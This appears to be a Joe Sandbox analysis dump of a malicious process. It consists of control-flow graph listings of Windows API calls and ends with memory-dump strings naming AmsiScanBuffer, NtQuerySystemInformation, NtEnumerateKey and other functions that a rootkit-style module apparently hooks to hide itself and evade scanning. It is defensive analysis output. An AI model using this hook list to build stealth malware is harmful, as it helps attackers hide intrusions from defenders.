22123c3494f 16221 22123c34968 16220->16221 16222 22123c3495e 16220->16222 16224 22123c2c5ac LeaveCriticalSection 16222->16224 18345 22123c22e54 18346 22123c22ea8 18345->18346 18347 22123c22ec3 18346->18347 18349 22123c237f4 18346->18349 18350 22123c2388a 18349->18350 18352 22123c23819 18349->18352 18350->18347 18351 22123c23f88 StrCmpNIW 18351->18352 18352->18350 18352->18351 18353 22123c21e08 StrCmpIW StrCmpW 18352->18353 18353->18352 18354 22123c2d658 18355 22123c2d67d 18354->18355 18360 22123c2d694 18354->18360 18356 22123c2d1f4 __std_exception_copy 13 API calls 18355->18356 18357 22123c2d682 18356->18357 18359 22123c2d04c _invalid_parameter_noinfo 38 API calls 18357->18359 18358 22123c2d724 18361 22123c2bb54 13 API calls 18358->18361 18362 22123c2d68d 18359->18362 18360->18358 18369 22123c2d6da 18360->18369 18371 22123c2d7b6 18360->18371 18387 22123c2d894 18360->18387 18449 22123c2da18 18360->18449 18363 22123c2d77c 18361->18363 18364 22123c2d784 18363->18364 18374 22123c2d7d7 18363->18374 18368 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18364->18368 18367 22123c2d836 18372 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18367->18372 18370 22123c2d78b 18368->18370 18373 22123c2d6fd 18369->18373 18376 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18369->18376 18370->18373 18377 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18370->18377 18371->18373 18380 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18371->18380 18375 22123c2d841 18372->18375 18378 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18373->18378 18374->18367 18374->18374 18384 22123c2d87c 18374->18384 18486 22123c30eb8 18374->18486 18379 22123c2d85a 18375->18379 18383 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18375->18383 18376->18369 18377->18370 18378->18362 18381 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18379->18381 18380->18371 18381->18362 18383->18375 18385 22123c2d06c _invalid_parameter_noinfo 17 API calls 18384->18385 18386 22123c2d891 18385->18386 18388 22123c2d8c2 18387->18388 18388->18388 18389 22123c2d8de 18388->18389 18390 22123c2d220 __std_exception_copy 13 API calls 18388->18390 18389->18360 18391 22123c2d90d 18390->18391 18392 22123c2d926 18391->18392 18393 22123c30eb8 38 API calls 18391->18393 18394 22123c30eb8 38 API calls 18392->18394 18404 22123c2d9fc 18392->18404 18393->18392 18395 22123c2d943 18394->18395 18397 22123c2d962 18395->18397 18400 22123c2d98d 18395->18400 18395->18404 18416 22123c2d97f 18395->18416 18396 22123c2d06c _invalid_parameter_noinfo 17 API calls 18402 22123c2da17 18396->18402 18398 22123c2d220 __std_exception_copy 13 API calls 18397->18398 18403 22123c2d96d 18398->18403 18399 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18399->18404 18401 22123c2d977 18400->18401 18495 22123c2eee0 18400->18495 18407 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18401->18407 18401->18416 18406 22123c2da7a 18402->18406 18504 22123c313d8 18402->18504 18408 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18403->18408 18404->18396 18410 22123c2da8c 18406->18410 18419 22123c2daa1 18406->18419 18407->18416 18408->18401 18409 22123c2d9b5 18411 22123c2d9ba 18409->18411 18412 22123c2d9d0 18409->18412 18415 22123c2d894 52 API calls 18410->18415 18417 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18411->18417 18414 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18412->18414 18414->18416 18418 22123c2da9c 18415->18418 18416->18399 18417->18401 18420 22123c28070 _invalid_parameter_noinfo 8 API calls 18418->18420 18421 22123c2dd78 14 API calls 18419->18421 18422 22123c2dd64 18420->18422 18423 22123c2db0b 18421->18423 18422->18360 18424 22123c2db1a 18423->18424 18425 22123c2f198 9 API calls 18423->18425 18513 22123c2d30c 18424->18513 18425->18424 18428 22123c2dba8 18429 22123c2d894 52 API calls 18428->18429 18431 22123c2dbb8 18429->18431 18430 22123c2dd78 14 API calls 18437 22123c2dbd2 18430->18437 18431->18418 18432 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18431->18432 18432->18418 18433 22123c2f198 9 API calls 18433->18437 18435 22123c2d894 52 API calls 18435->18437 18436 22123c2dcc8 FindNextFileW 18436->18437 18438 22123c2dce0 18436->18438 18437->18430 18437->18433 18437->18435 18437->18436 18439 22123c2d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 18437->18439 18440 22123c2dd2a 18437->18440 18535 22123c2d4ac 18437->18535 18441 22123c2dd0c FindClose 18438->18441 18557 22123c30b20 18438->18557 18439->18437 18442 22123c2dd38 FindClose 18440->18442 18445 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18440->18445 18441->18418 18444 22123c2dd1c 18441->18444 18442->18418 18446 22123c2dd48 18442->18446 18447 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18444->18447 18445->18442 18448 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18446->18448 18447->18418 18448->18418 18450 22123c2da58 18449->18450 18451 22123c2da7a 18449->18451 18450->18451 18453 22123c313d8 38 API calls 18450->18453 18452 22123c2da8c 18451->18452 18455 22123c2daa1 18451->18455 18454 22123c2d894 56 API calls 18452->18454 18453->18450 18480 22123c2da9c 18454->18480 18457 22123c2dd78 14 API calls 18455->18457 18456 22123c28070 _invalid_parameter_noinfo 8 API calls 18458 22123c2dd64 18456->18458 18459 22123c2db0b 18457->18459 18458->18360 18460 22123c2db1a 18459->18460 18461 22123c2f198 9 API calls 18459->18461 18462 22123c2d30c 16 API calls 18460->18462 18461->18460 18463 22123c2db7b FindFirstFileExW 18462->18463 18464 22123c2dbd2 18463->18464 18465 22123c2dba8 18463->18465 18467 22123c2dd78 14 API calls 18464->18467 18470 22123c2f198 9 API calls 18464->18470 18471 22123c2d4ac 16 API calls 18464->18471 18472 22123c2d894 56 API calls 18464->18472 18473 22123c2dcc8 FindNextFileW 18464->18473 18475 22123c2d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 18464->18475 18476 22123c2dd2a 18464->18476 18466 22123c2d894 56 API calls 18465->18466 18468 22123c2dbb8 18466->18468 18467->18464 18469 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18468->18469 18468->18480 18469->18480 18470->18464 18471->18464 18472->18464 18473->18464 18474 22123c2dce0 18473->18474 18477 22123c2dd0c FindClose 18474->18477 18479 22123c30b20 38 API calls 18474->18479 18475->18464 18478 22123c2dd38 FindClose 18476->18478 18482 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18476->18482 18477->18480 18481 22123c2dd1c 18477->18481 18478->18480 18483 22123c2dd48 18478->18483 18479->18477 18480->18456 18484 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18481->18484 18482->18478 18485 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18483->18485 18484->18480 18485->18480 18490 22123c30ed5 18486->18490 18487 22123c30eda 18488 22123c30ef0 18487->18488 18489 22123c2d1f4 __std_exception_copy 13 API calls 18487->18489 18488->18374 18491 22123c30ee4 18489->18491 18490->18487 18490->18488 18493 22123c30f24 18490->18493 18492 22123c2d04c _invalid_parameter_noinfo 38 API calls 18491->18492 18492->18488 18493->18488 18494 22123c2d1f4 __std_exception_copy 13 API calls 18493->18494 18494->18491 18496 22123c2ef02 18495->18496 18497 22123c2ef1f 18495->18497 18496->18497 18498 22123c2ef10 18496->18498 18501 22123c2ef29 18497->18501 18565 22123c319f0 18497->18565 18500 22123c2d1f4 __std_exception_copy 13 API calls 18498->18500 18503 22123c2ef15 18500->18503 18572 22123c31a40 18501->18572 18503->18409 18505 22123c313e0 18504->18505 18506 22123c313f5 18505->18506 18507 22123c3140e 18505->18507 18508 22123c2d1f4 __std_exception_copy 13 API calls 18506->18508 18510 22123c31405 18507->18510 18512 22123c2dd78 14 API calls 18507->18512 18509 22123c313fa 18508->18509 18511 22123c2d04c _invalid_parameter_noinfo 38 API calls 18509->18511 18510->18402 18511->18510 18512->18510 18514 22123c2d336 18513->18514 18515 22123c2d35a 18513->18515 18518 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18514->18518 18520 22123c2d345 FindFirstFileExW 18514->18520 18516 22123c2d3bf 18515->18516 18517 22123c2d35f 18515->18517 18519 22123c2ec58 MultiByteToWideChar 18516->18519 18517->18520 18521 22123c2d374 18517->18521 18523 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18517->18523 18518->18520 18528 22123c2d3db 18519->18528 18520->18428 18520->18437 18524 22123c2c5d0 14 API calls 18521->18524 18522 22123c2d3e2 GetLastError 18525 22123c2d184 13 API calls 18522->18525 18523->18521 18524->18520 18527 22123c2d3ef 18525->18527 18526 22123c2ec58 MultiByteToWideChar 18529 22123c2d47a 18526->18529 18530 22123c2d1f4 __std_exception_copy 13 API calls 18527->18530 18528->18522 18531 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18528->18531 18533 22123c2d413 18528->18533 18534 22123c2d420 18528->18534 18529->18520 18529->18522 18530->18520 18531->18533 18532 22123c2c5d0 14 API calls 18532->18534 18533->18532 18534->18520 18534->18526 18536 22123c2d4d6 18535->18536 18537 22123c2d4fa 18535->18537 18540 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18536->18540 18544 22123c2d4e5 18536->18544 18538 22123c2d500 18537->18538 18539 22123c2d55f 18537->18539 18542 22123c2d515 18538->18542 18538->18544 18545 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18538->18545 18541 22123c2ece8 WideCharToMultiByte 18539->18541 18540->18544 18551 22123c2d583 18541->18551 18546 22123c2c5d0 14 API calls 18542->18546 18543 22123c2d58a GetLastError 18547 22123c2d184 13 API calls 18543->18547 18544->18437 18545->18542 18546->18544 18550 22123c2d597 18547->18550 18548 22123c2d5c7 18548->18544 18549 22123c2ece8 WideCharToMultiByte 18548->18549 18554 22123c2d629 18549->18554 18555 22123c2d1f4 __std_exception_copy 13 API calls 18550->18555 18551->18543 18551->18548 18552 22123c2d5bb 18551->18552 18556 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18551->18556 18553 22123c2c5d0 14 API calls 18552->18553 18553->18548 18554->18543 18554->18544 18555->18544 18556->18552 18558 22123c30b52 18557->18558 18559 22123c2d1f4 __std_exception_copy 13 API calls 18558->18559 18564 22123c30b67 18558->18564 18560 22123c30b5c 18559->18560 18561 22123c2d04c _invalid_parameter_noinfo 38 API calls 18560->18561 18561->18564 18562 22123c28070 _invalid_parameter_noinfo 8 API calls 18563 22123c30ea8 18562->18563 18563->18441 18564->18562 18566 22123c31a12 HeapSize 18565->18566 18567 22123c319f9 18565->18567 18568 22123c2d1f4 __std_exception_copy 13 API calls 18567->18568 18569 22123c319fe 18568->18569 18570 22123c2d04c _invalid_parameter_noinfo 38 API calls 18569->18570 18571 22123c31a09 18570->18571 18571->18501 18573 22123c31a55 18572->18573 18574 22123c31a5f 18572->18574 18575 22123c2c5d0 14 API calls 18573->18575 18576 22123c31a64 18574->18576 18582 22123c31a6b __std_exception_copy 18574->18582 18580 22123c31a5d 18575->18580 18579 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18576->18579 18577 22123c31a71 18581 22123c2d1f4 __std_exception_copy 13 API calls 18577->18581 18578 22123c31a9e HeapReAlloc 18578->18580 18578->18582 18579->18580 18580->18503 18581->18580 18582->18577 18582->18578 18583 22123c2b470 __std_exception_copy 2 API calls 18582->18583 18583->18582 16242 22123c33960 16252 22123c28ca0 16242->16252 16244 22123c33988 16246 22123c29324 _CreateFrameInfo 9 API calls 16247 22123c33998 16246->16247 16248 22123c29324 _CreateFrameInfo 9 API calls 16247->16248 16249 22123c339a1 16248->16249 16256 22123c2c2f4 16249->16256 16255 22123c28cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 16252->16255 16253 22123c28dd1 16253->16244 16253->16246 16254 22123c28d94 RtlUnwindEx 16254->16255 16255->16253 16255->16254 16257 22123c2cab0 _invalid_parameter_noinfo 14 API calls 16256->16257 16258 22123c2c2fd 16257->16258 17414 22123c27f60 17415 22123c27f81 17414->17415 17416 22123c27f7c 17414->17416 17418 22123c28090 17416->17418 17419 22123c280b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17418->17419 17420 22123c28127 17418->17420 17419->17420 17420->17415 18601 22123c3465f 18602 22123c346e2 18601->18602 18603 22123c34677 18601->18603 18603->18602 18604 22123c29324 _CreateFrameInfo 9 API calls 18603->18604 18605 22123c346c4 18604->18605 18606 22123c29324 _CreateFrameInfo 9 API calls 18605->18606 18607 22123c346d9 18606->18607 18608 22123c2c2f4 14 API calls 18607->18608 18608->18602 16766 22123c3485e 16767 22123c29324 _CreateFrameInfo 9 API calls 16766->16767 16768 22123c3486c 16767->16768 16769 22123c34877 16768->16769 16770 22123c29324 _CreateFrameInfo 9 API calls 16768->16770 16770->16769 16797 22123c2f870 16798 22123c2f8a0 16797->16798 16799 22123c2f8c7 16797->16799 16798->16799 16800 22123c2cb10 __std_exception_copy 13 API calls 16798->16800 16803 22123c2f8b4 16798->16803 16801 22123c2f99c 16799->16801 16820 22123c2c558 EnterCriticalSection 16799->16820 16800->16803 16804 22123c2fab3 16801->16804 16806 22123c2fa03 16801->16806 16812 22123c2f9ca 16801->16812 16803->16799 16805 22123c2f949 16803->16805 16815 22123c2f904 16803->16815 16807 22123c2fac0 16804->16807 16822 22123c2c5ac LeaveCriticalSection 16804->16822 16808 22123c2d1f4 __std_exception_copy 13 API calls 16805->16808 16817 22123c2fa61 16806->16817 16821 22123c2c5ac LeaveCriticalSection 16806->16821 16811 22123c2f94e 16808->16811 16813 22123c2d04c _invalid_parameter_noinfo 38 API calls 16811->16813 16812->16806 16814 22123c2cab0 _invalid_parameter_noinfo 14 API calls 16812->16814 16813->16815 16816 22123c2f9f3 16814->16816 16818 22123c2cab0 _invalid_parameter_noinfo 14 API calls 16816->16818 16819 22123c2cab0 14 API calls _invalid_parameter_noinfo 16817->16819 16818->16806 16819->16817 17440 22123c2f370 VirtualProtect 16259 22123c25974 16260 22123c2597a 16259->16260 16271 22123c27fa0 16260->16271 16264 22123c259de 16266 22123c25a77 16266->16264 16267 22123c25bfd 16266->16267 16284 22123c27b80 16266->16284 16268 22123c25cfb 16267->16268 16269 22123c25d77 VirtualProtect 16267->16269 16269->16264 16270 22123c25da3 GetLastError 16269->16270 16270->16264 16274 22123c27fab 16271->16274 16272 22123c259bd 16272->16264 16280 22123c24400 16272->16280 16273 22123c2b470 __std_exception_copy 2 API calls 16273->16274 16274->16272 16274->16273 16275 22123c27fca 16274->16275 16276 22123c27fd5 16275->16276 16290 22123c287b8 16275->16290 16294 22123c287d8 16276->16294 16281 22123c2441d 16280->16281 16283 22123c2448c 16281->16283 16303 22123c24670 16281->16303 16283->16266 16285 22123c27bc7 16284->16285 16328 22123c27950 16285->16328 16288 22123c28070 _invalid_parameter_noinfo 8 API calls 16289 22123c27bf1 16288->16289 16289->16266 16291 22123c287c6 std::bad_alloc::bad_alloc 16290->16291 16298 22123c29178 16291->16298 16293 22123c287d7 16295 22123c287e6 std::bad_alloc::bad_alloc 16294->16295 16296 22123c29178 Concurrency::cancel_current_task 2 API calls 16295->16296 16297 22123c27fdb 16296->16297 16299 22123c29197 16298->16299 16300 22123c291e2 RaiseException 16299->16300 16301 22123c291c0 RtlPcToFileHeader 16299->16301 16300->16293 16302 22123c291d8 16301->16302 16302->16300 16304 22123c24694 16303->16304 16305 22123c246b7 16303->16305 16304->16305 16317 22123c24120 16304->16317 16306 22123c246ed 16305->16306 16323 22123c24250 16305->16323 16309 22123c24250 2 API calls 16306->16309 16310 22123c2471d 16306->16310 16309->16310 16311 22123c24120 3 API calls 16310->16311 16315 22123c24753 16310->16315 16311->16315 16312 22123c24120 3 API calls 16313 22123c2476f 16312->16313 16314 22123c2478b 16313->16314 16316 22123c24250 2 API calls 16313->16316 16314->16283 16315->16312 16315->16313 16316->16314 16322 22123c24141 16317->16322 16318 22123c24196 VirtualQuery 16320 22123c241b0 16318->16320 16318->16322 16319 22123c241ca VirtualAlloc 16319->16320 16321 22123c241fb GetLastError 16319->16321 16320->16305 16321->16322 16322->16318 16322->16319 16322->16320 16327 22123c24268 16323->16327 16324 22123c242d7 16324->16306 16325 22123c242bd VirtualQuery 16325->16324 16325->16327 16326 22123c24322 GetLastError 16326->16327 16327->16324 16327->16325 16327->16326 16329 22123c2796b 16328->16329 16330 22123c27981 SetLastError 16329->16330 16331 22123c2798f 16329->16331 16330->16331 16331->16288 18609 22123c28672 18610 22123c290c0 __std_exception_copy 38 API calls 18609->18610 18611 22123c2869d 18610->18611 16823 22123c3387c 16824 22123c338b4 __GSHandlerCheckCommon 16823->16824 16825 22123c338e0 16824->16825 16827 22123c29a24 16824->16827 16828 22123c29324 _CreateFrameInfo 9 API calls 16827->16828 16829 22123c29a4e 16828->16829 16830 22123c29324 _CreateFrameInfo 9 API calls 16829->16830 16831 22123c29a5b 16830->16831 16832 22123c29324 _CreateFrameInfo 9 API calls 16831->16832 16833 22123c29a64 16832->16833 16833->16825 16429 22123c2c180 16432 22123c2bf38 16429->16432 16439 22123c2bf00 16432->16439 16440 22123c2bf15 16439->16440 16441 22123c2bf10 16439->16441 16443 22123c2bf1c 16440->16443 16442 22123c2bebc 13 API calls 16441->16442 16442->16440 16444 22123c2bf31 16443->16444 16445 22123c2bf2c 16443->16445 16447 22123c2bebc 16444->16447 16446 22123c2bebc 13 API calls 16445->16446 16446->16444 16448 22123c2bec1 16447->16448 16449 22123c2bef2 16447->16449 16450 22123c2beea 16448->16450 16452 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16448->16452 16451 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16450->16451 16451->16449 16452->16448 17441 22123c28f0c 17448 22123c2946c 17441->17448 17444 22123c28f19 17449 22123c29474 17448->17449 17451 22123c294a5 17449->17451 17452 22123c28f15 17449->17452 17465 22123c29d28 17449->17465 17453 22123c294b4 __vcrt_uninitialize_locks DeleteCriticalSection 17451->17453 17452->17444 17454 22123c29400 17452->17454 17453->17452 17470 22123c29bfc 17454->17470 17466 22123c29aac __vcrt_InitializeCriticalSectionEx 5 API calls 17465->17466 17467 22123c29d5e 17466->17467 17468 22123c29d73 InitializeCriticalSectionAndSpinCount 17467->17468 17469 22123c29d68 17467->17469 17468->17469 17469->17449 17471 22123c29aac __vcrt_InitializeCriticalSectionEx 5 API calls 17470->17471 17472 22123c29c21 TlsAlloc 17471->17472 18615 22123c2820c 18622 22123c28f34 18615->18622 18617 22123c28219 18623 22123c29340 _CreateFrameInfo 9 API calls 18622->18623 18624 22123c28215 18623->18624 18624->18617 18625 22123c2c288 18624->18625 18626 22123c2cb10 __std_exception_copy 13 API calls 18625->18626 18627 22123c28222 18626->18627 18627->18617 18628 22123c28f48 18627->18628 18631 22123c292dc 18628->18631 18630 22123c28f51 18630->18617 18632 22123c29302 18631->18632 18633 22123c292ed 18631->18633 18632->18630 18634 22123c29c8c _CreateFrameInfo 6 API calls 18633->18634 18635 22123c292f2 18634->18635 18637 22123c29cd4 18635->18637 18638 22123c29aac __vcrt_InitializeCriticalSectionEx 5 API calls 18637->18638 18639 22123c29d02 18638->18639 18640 22123c29d14 TlsSetValue 18639->18640 18641 22123c29d0c 18639->18641 18640->18641 18641->18632 16461 22123c2c510 16462 22123c2c518 16461->16462 16463 22123c2c545 16462->16463 16465 22123c2c574 16462->16465 16466 22123c2c59f 16465->16466 16467 22123c2c5a3 16466->16467 16468 22123c2c582 DeleteCriticalSection 16466->16468 16467->16463 16468->16466 18678 22123c34611 __scrt_dllmain_exception_filter 18679 22123c2c218 18680 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18679->18680 18681 22123c2c228 18680->18681 18682 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18681->18682 18683 22123c2c23c 18682->18683 18684 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18683->18684 18685 22123c2c250 18684->18685 18686 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18685->18686 18687 22123c2c264 18686->18687 16473 22123c22518 GetProcessIdOfThread GetCurrentProcessId 16474 22123c22543 CreateFileW 16473->16474 16475 22123c225be 16473->16475 16474->16475 16476 22123c22577 WriteFile ReadFile CloseHandle 16474->16476 16476->16475 16870 22123c2f820 16873 22123c2f7d8 16870->16873 16878 22123c2c558 EnterCriticalSection 16873->16878 18701 22123c2fe20 18702 22123c2fe4a 18701->18702 18703 22123c2d220 __std_exception_copy 13 API calls 18702->18703 18704 22123c2fe6a 18703->18704 18705 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18704->18705 18706 22123c2fe78 18705->18706 18707 22123c2fea2 18706->18707 18709 22123c2d220 __std_exception_copy 13 API calls 18706->18709 18708 22123c2fec1 InitializeCriticalSectionEx 18707->18708 18712 22123c2feab 18707->18712 18708->18707 18710 22123c2fe94 18709->18710 18711 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18710->18711 18711->18707 17512 22123c24320 17515 22123c2426d 17512->17515 17513 22123c242d7 17514 22123c242bd VirtualQuery 17514->17513 17514->17515 17515->17513 17515->17514 17516 22123c24322 GetLastError 17515->17516 17516->17515 16927 22123c2c828 16928 22123c2c842 16927->16928 16929 22123c2c82d 16927->16929 16933 22123c2c848 16929->16933 16934 22123c2c88a 16933->16934 16938 22123c2c892 16933->16938 16936 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16934->16936 16935 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16937 22123c2c89f 16935->16937 16936->16938 16939 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16937->16939 16938->16935 16940 22123c2c8ac 16939->16940 16941 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16940->16941 16942 22123c2c8b9 16941->16942 16943 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16942->16943 16944 22123c2c8c6 16943->16944 16945 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16944->16945 16946 22123c2c8d3 16945->16946 16947 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16946->16947 16948 22123c2c8e0 16947->16948 16949 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16948->16949 16950 22123c2c8ed 16949->16950 16951 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16950->16951 16952 22123c2c8fd 16951->16952 16953 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16952->16953 16954 22123c2c90d 16953->16954 16959 22123c2c6f8 16954->16959 16973 22123c2c558 EnterCriticalSection 16959->16973 17000 22123c2ec30 GetCommandLineA GetCommandLineW 17001 22123c26430 17002 22123c2643d 17001->17002 17004 22123c26449 17002->17004 17005 22123c2655a 17002->17005 17003 22123c264cd 17004->17003 17006 22123c264a6 SetThreadContext 17004->17006 17007 22123c26581 VirtualProtect FlushInstructionCache 17005->17007 17008 22123c2663e 17005->17008 17006->17003 17007->17005 17009 22123c2665e 17008->17009 17017 22123c24b20 17008->17017 17021 22123c25530 GetCurrentProcess 17009->17021 17012 22123c266b7 17015 22123c28070 _invalid_parameter_noinfo 8 API calls 17012->17015 17013 22123c26677 ResumeThread 17014 22123c26663 17013->17014 17014->17012 17014->17013 17016 22123c266ff 17015->17016 17019 22123c24b3c 17017->17019 17018 22123c24b9f 17018->17009 17019->17018 17020 22123c24b52 VirtualFree 17019->17020 17020->17019 17022 22123c2554c 17021->17022 17023 22123c25593 17022->17023 17024 22123c25562 VirtualProtect FlushInstructionCache 17022->17024 17023->17014 17024->17022 16477 22123c2bd34 16478 22123c2bd4d 16477->16478 16491 22123c2bd49 16477->16491 16479 22123c2e864 56 API calls 16478->16479 16480 22123c2bd52 16479->16480 16492 22123c2edc8 GetEnvironmentStringsW 16480->16492 16483 22123c2bd6b 16512 22123c2bda8 16483->16512 16484 22123c2bd5f 16485 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16484->16485 16485->16491 16488 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16489 22123c2bd92 16488->16489 16490 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16489->16490 16490->16491 16493 22123c2bd57 16492->16493 16494 22123c2edf8 16492->16494 16493->16483 16493->16484 16495 22123c2ece8 WideCharToMultiByte 16494->16495 16496 22123c2ee49 16495->16496 16497 22123c2ee53 FreeEnvironmentStringsW 16496->16497 16498 22123c2c5d0 14 API calls 16496->16498 16497->16493 16499 22123c2ee63 16498->16499 16500 22123c2ee74 16499->16500 16501 22123c2ee6b 16499->16501 16503 22123c2ece8 WideCharToMultiByte 16500->16503 16502 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16501->16502 16504 22123c2ee72 16502->16504 16505 22123c2ee97 16503->16505 16504->16497 16506 22123c2eea5 16505->16506 16507 22123c2ee9b 16505->16507 16509 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16506->16509 16508 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16507->16508 16510 22123c2eea3 FreeEnvironmentStringsW 16508->16510 16509->16510 16510->16493 16513 22123c2bdcd 16512->16513 16514 22123c2d220 __std_exception_copy 13 API calls 16513->16514 16526 22123c2be03 16514->16526 16515 22123c2be0b 16516 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16515->16516 16517 22123c2bd73 16516->16517 16517->16488 16518 22123c2be6d 16519 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16518->16519 16519->16517 16520 22123c2d220 __std_exception_copy 13 API calls 16520->16526 16521 22123c2be92 16522 22123c2bebc 13 API calls 16521->16522 16524 22123c2be9a 16522->16524 16525 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16524->16525 16525->16515 16526->16515 16526->16518 16526->16520 16526->16521 16527 22123c2bea6 16526->16527 16529 22123c2d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16526->16529 16531 22123c2c328 16526->16531 16528 22123c2d06c _invalid_parameter_noinfo 17 API calls 16527->16528 16530 22123c2beb9 16528->16530 16529->16526 16532 22123c2c33f 16531->16532 16533 22123c2c335 16531->16533 16534 22123c2d1f4 __std_exception_copy 13 API calls 16532->16534 16533->16532 16535 22123c2c35a 16533->16535 16539 22123c2c346 16534->16539 16537 22123c2c352 16535->16537 16538 22123c2d1f4 __std_exception_copy 13 API calls 16535->16538 16536 22123c2d04c _invalid_parameter_noinfo 38 API calls 16536->16537 16537->16526 16538->16539 16539->16536 18713 22123c21e3c LoadLibraryA GetProcAddress 18714 22123c21e62 Sleep 18713->18714 18715 22123c21e6f 18713->18715 18714->18714 17026 22123c2f440 GetProcessHeap 17546 22123c2ff40 17547 22123c2ff4b 17546->17547 17555 22123c32c24 17547->17555 17568 22123c2c558 EnterCriticalSection 17555->17568 15063 22123c51e3c LoadLibraryA GetProcAddress 15064 22123c51e62 SleepEx 15063->15064 15065 22123c51e6f 15063->15065 15064->15064

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: e303c6b6d310c1d98142e91b6ef07180afea97f904d151b925c6e5f5f6b7cb27
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
